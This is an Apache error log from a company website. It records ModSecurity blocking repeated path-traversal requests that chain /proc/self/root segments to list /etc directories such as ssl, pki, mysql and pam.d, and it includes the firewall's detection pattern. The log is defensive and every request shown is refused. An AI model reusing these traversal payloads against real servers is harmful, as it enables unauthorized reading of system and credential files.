[Tue Mar 17 16:35:25.577559 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:58532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abms_XIk7brgkOH-rIWbOwAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:35:32.129659 2026] [proxy_fcgi:error] [pid 18380:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43994] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:35:55.089802 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44360] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:36:04.956495 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:39578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtJIh-PF_25v4hFRB6UQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:08.143282 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.241.31:40588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtKK4xEDsg_V3ESNZauQAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:10.358220 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.241.31:40588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtKK4xEDsg_V3ESNZavAAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:11.669549 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.241.31:40604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtK_PqhzTj3BvfDX-XIwAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:14.668339 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:40612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtLta6ubjKNq_cu4YXpwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:17.122746 2026] [proxy_fcgi:error] [pid 6296:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:36:17.607349 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:55310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtMdY0UrI5A3LftIwMjwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:20.783840 2026] [:error] [pid 7004:tid 140411624429312] [client 74.7.241.31:55316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtNMU6Sx0TG1YjmQi97gAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:23.764596 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:55330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtN4h-PF_25v4hFRB6XAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:26.626775 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:55346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtOta6ubjKNq_cu4YXrgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:30.327529 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:48384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtPtY0UrI5A3LftIwMmgAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:37.507558 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:48398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtRdY0UrI5A3LftIwMoQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:39.874718 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:55728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtR6BJNF7axNlVR0Un3AAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:40.129792 2026] [proxy_fcgi:error] [pid 29151:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:36:42.063525 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:55740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtStY0UrI5A3LftIwMogAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:44.996388 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:55748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtTK4xEDsg_V3ESNZaxgAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:50.488276 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:44824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtUvPqhzTj3BvfDX-XNAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:50.783047 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.128:42938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtUqBJNF7axNlVR0Un4wAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:52.370937 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.241.31:44830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtVK4xEDsg_V3ESNZazAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:36:55.219110 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:44844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtV9Y0UrI5A3LftIwMqgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:00.463003 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.241.31:52204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmtXBj0p0SRWAqcjGGJMwAAAwI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:37:02.146046 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45556] AH01075: Error dispatching request to : (polling)
